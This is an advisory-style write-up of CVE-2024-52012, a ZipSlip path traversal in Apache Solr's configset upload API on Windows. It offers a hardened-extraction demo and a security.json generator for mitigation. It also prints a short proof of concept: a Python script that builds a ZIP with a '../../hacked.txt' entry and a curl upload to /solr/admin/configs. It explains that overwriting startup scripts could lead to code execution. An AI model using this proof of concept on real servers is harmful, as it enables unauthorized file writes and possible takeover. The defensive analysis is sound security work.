CVE-2024-52012 - Relative Path Traversal ("ZipSlip") Vulnerability in Apache Solr – Full Exploit Details & Mitigation
Published: January 2025
Summary
On Windows systems, Apache Solr versions 6.6 through 9.7.0 are vulnerable to a relative path traversal (a "ZipSlip") in the configset upload API. An attacker can use it to write files outside the intended extraction directory, which gives arbitrary file write with the privileges of the Solr process and, depending on what gets overwritten, potential remote code execution or denial of service.
This long-read explains CVE-2024-52012, why it happens, how attackers exploit it, the risks, and how to stay safe.
What is Apache Solr?
Apache Solr is a popular open-source search platform for big data and enterprise search.
One of its features lets admins upload configuration sets ("configsets"), often in ZIP format, via an API. This speeds up configuration, but, as we’ll show, also introduces risk when not properly sanitized.
The Root Cause
When a configset ZIP is uploaded through the configset API, Solr extracts its contents straight onto the server filesystem.
The vulnerability arises because Solr did not sanitize the entry names inside the ZIP before extracting them. If an entry name contains relative path segments (for example ../../hacked.txt), the file is written outside the target configset directory, anywhere the Solr process is allowed to write.
This is classic ZipSlip: an archive-extraction flaw caused by trusting the paths stored in archive entries instead of checking that each resolved path stays inside the extraction directory.
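To make the extraction flaw concrete, here is an added example (written for this page, not Solr's own code) of a hardened extractor next to the kind of substring check that is not enough. It builds a constructed in-memory ZIP containing one legitimate configset file and several traversal-shaped entries, then shows which ones a proper containment check rejects. One assumption is made explicit in the code: backslashes are treated as path separators on every host, mirroring how Windows resolves them, so the check does not depend on the OS it happens to run on. The naive check is illustrative of the general mistake and is not a claim about Solr's exact code.

```python
import io
import os
import posixpath
import tempfile
import zipfile

# Constructed sample archive (not a real payload from the advisory): one
# legitimate configset file plus four entries shaped like ZipSlip attempts.
SAMPLE_ENTRIES = {
    "solrconfig.xml": "<config/>",
    "../../hacked.txt": "forward-slash traversal",
    "..\\..\\hacked2.txt": "backslash traversal, a separator on Windows",
    "/etc/passwd": "absolute path",
    "lang/../../escape.txt": "traversal hidden behind a real directory",
}


def build_zip(entries):
    """Write the entries to an in-memory ZIP exactly as given (no name cleanup)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def naive_check(name):
    """The kind of substring check that is NOT sufficient: it misses backslash
    separators, so '..\\..\\x' passes even though Windows resolves it upward."""
    return "../" not in name and not name.startswith("/")


def resolve_entry(dest, name):
    """Return the absolute on-disk target for a ZIP entry, or None if it would
    land outside dest. Backslashes are treated as separators on every host
    (assumption: mirror Windows behaviour so the check is not OS-dependent),
    absolute and drive-letter names are rejected, and containment is decided
    on the canonical (realpath) form rather than by string matching."""
    norm = name.replace("\\", "/")
    if posixpath.isabs(norm) or (len(norm) > 1 and norm[1] == ":"):
        return None
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, *norm.split("/")))
    if os.path.commonpath([dest_real, target]) != dest_real or target == dest_real:
        return None
    return target


def safe_extract(zip_bytes, dest):
    """Extract only entries that stay inside dest. Returns (written, rejected)."""
    written, rejected = [], []
    dest_real = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = resolve_entry(dest_real, info.filename)
            if target is None:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.relpath(target, dest_real))
    return written, rejected


def demo():
    """Run the hardened extractor in a scratch tree shaped like
    <solr-home>/configsets/<name> and report what landed where."""
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "configsets", "evilset")
        os.makedirs(dest)
        written, rejected = safe_extract(build_zip(SAMPLE_ENTRIES), dest)
        # Anything other than the configsets tree would mean an escape.
        escaped = [p for p in os.listdir(tmp) if p != "configsets"]
        # Entries the hardened check rejected but the naive check would have let through.
        bypassed_naive = [n for n in rejected if naive_check(n)]
    return written, rejected, escaped, bypassed_naive


if __name__ == "__main__":
    print(demo())
```

The point of deciding containment on the canonical path (rather than searching the name for ../) is that it also catches the backslash form, absolute names, and traversal buried behind a real-looking directory such as lang/../../.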
Official Advisory
- Apache Security Team notification: https://solr.apache.org/security.html#cve-2024-52012
Exploitation: How Hackers Attack
Suppose Solr runs on Windows, is reachable over the network, and the configset upload endpoint requires no authentication (Solr ships with authentication disabled, which is common on test/dev installs).
Craft a Malicious ZIP:
- Create a ZIP with an entry path like ../../out_of_bounds.txt
Upload ZIP via Configset API:
- Use an HTTP POST request to /solr/admin/configs?action=UPLOAD
Solr Extracts Files:
- ZIP contents are written to paths outside the configset directory, limited only by the privileges of the Solr service account.
Crafting the Malicious ZIP (Python)
import zipfile

# The entry name carries relative path segments; a vulnerable extractor
# resolves it two directories above the configset directory.
malicious_zip = 'evil.zip'
with zipfile.ZipFile(malicious_zip, 'w') as zf:
    zf.writestr('../../hacked.txt', 'You got hacked!')
print('Malicious ZIP created.')
Uploading with curl
curl -X POST "http://<solr-server>:8983/solr/admin/configs?action=UPLOAD&name=evilset" \
  -H "Content-Type: application/octet-stream" --data-binary "@evil.zip"
After this, on a vulnerable instance, hacked.txt is created outside the configsets directory (for an install under C:\solr, somewhere like C:\solr\hacked.txt); deeper ../ sequences reach correspondingly higher directories.
From there the attacker can try to overwrite sensitive files (e.g., bin\solr.in.cmd, the Windows startup configuration), subject to the permissions of the Solr service account.
Danger Level
- Arbitrary Write: Any file the Solr process can write can be created or overwritten, including configs, scripts, and executables.
- RCE Possibility: If the attacker overwrites code that Solr later executes (a startup script, a library, a served resource), remote code execution may follow.
Fixing and Mitigating CVE-2024-52012
Official Patch / Upgrade
The quickest and surest fix: upgrade Apache Solr to version 9.8.0 or later.
- Download latest: https://solr.apache.org/downloads.html
- Official advisory: https://solr.apache.org/security.html#cve-2024-52012
- The fix sanitizes ZIP entry names at extraction time, so entries that would resolve outside the target configset directory are rejected.
Lock Down Configset Upload:
- Use Solr’s Rule-Based Authorization Plugin (solr.RuleBasedAuthorizationPlugin), together with an authentication plugin such as Basic Auth, so that only trusted, authenticated users can reach the upload API (/solr/admin/configs). The advisory lists this as the mitigation for deployments that cannot upgrade immediately.
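As an added example (not from the page or the Solr project), the following script generates a security.json that enforces this: Basic Auth with unknown users blocked, an explicit rule on /admin/configs for action=UPLOAD, a read-only role for query users, and a catch-all rule so that anything not matched earlier still requires the admin role. The credential format follows Solr's BasicAuthPlugin scheme, base64(sha256(sha256(salt || password))) followed by base64(salt), and the script checks itself against the credential for user solr / password SolrRocks that appears in Solr's own Basic Auth documentation. User names and passwords below are placeholders.

```python
import base64
import hashlib
import json
import os

# Credential for user "solr", password "SolrRocks", as shown in Solr's Basic
# Authentication Plugin documentation; used here only to validate the hashing.
DOCUMENTED_SOLR_CRED = (
    "IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= "
    "Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="
)


def solr_credential(password, salt=None):
    """BasicAuthPlugin credential: base64(sha256(sha256(salt||pw))) + ' ' + base64(salt)."""
    if salt is None:
        salt = os.urandom(32)
    inner = hashlib.sha256(salt + password.encode("utf-8")).digest()
    outer = hashlib.sha256(inner).digest()
    return base64.b64encode(outer).decode() + " " + base64.b64encode(salt).decode()


def credential_matches(password, credential):
    """Re-derive the hash with the stored salt and compare."""
    _hashed, salt_b64 = credential.split(" ")
    return solr_credential(password, base64.b64decode(salt_b64)) == credential


def build_security_json(admin_user, admin_password, reader_user, reader_password):
    """Policy: authenticated-only access; configset UPLOAD and everything not
    listed is admin-only; readers may only query. Rules match first-to-last."""
    return {
        "authentication": {
            "class": "solr.BasicAuthPlugin",
            "blockUnknown": True,  # reject unauthenticated requests outright
            "credentials": {
                admin_user: solr_credential(admin_password),
                reader_user: solr_credential(reader_password),
            },
        },
        "authorization": {
            "class": "solr.RuleBasedAuthorizationPlugin",
            "permissions": [
                # Explicit rule for the endpoint abused by CVE-2024-52012
                # (node-level path, hence "collection": null).
                {"name": "configset-upload", "path": "/admin/configs",
                 "collection": None, "params": {"action": ["UPLOAD"]},
                 "role": "admin"},
                # Predefined "read" permission for query traffic.
                {"name": "read", "role": ["admin", "reader"]},
                # Catch-all: anything not matched above needs admin, so the
                # policy does not hinge on the params match alone.
                {"name": "all", "role": "admin"},
            ],
            "user-role": {admin_user: "admin", reader_user: "reader"},
        },
    }


def render_security_json(admin_user, admin_password, reader_user, reader_password):
    """Return (policy dict, JSON text) ready to write to security.json."""
    policy = build_security_json(admin_user, admin_password, reader_user, reader_password)
    return policy, json.dumps(policy, indent=2)


if __name__ == "__main__":
    # Placeholder accounts; replace before use.
    _policy, text = render_security_json("solr", "ChangeMe-Admin", "search", "ChangeMe-Reader")
    print(text)
```

Write the output to security.json in SOLR_HOME for a standalone install, or upload it to ZooKeeper in SolrCloud mode; after a restart, the curl upload shown earlier fails without valid admin credentials.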
Who Is Most at Risk
- Windows servers where the configset API is unprotected.
- Dev/test servers with default or weak authentication.
Additional Resources
- Solr Security Documentation
- Original Patch Commit (may differ, check latest)
- OWASP ZipSlip background
Conclusion and Recommendations
CVE-2024-52012 is easy to exploit and has serious consequences. All Windows-based Solr deployments should be considered at risk until patched. Even if you don’t expose your Solr to the internet, a compromised application or internal attacker could leverage this flaw to escalate their access.
Never expose Solr admin interfaces to the public internet.
*Stay ahead of attackers—patch fast, restrict access, and monitor your systems!*
If you found this writeup useful, share it and stay safe. For technical questions, check the Solr mailing lists, or ask below.
*This article is an exclusive, original summary based on the public CVE disclosure and Solr advisories. Please reference Apache Solr Security for official updates.*
Timeline
Published on: 01/27/2025 09:15:14 UTC
Last modified on: 02/06/2025 17:15:19 UTC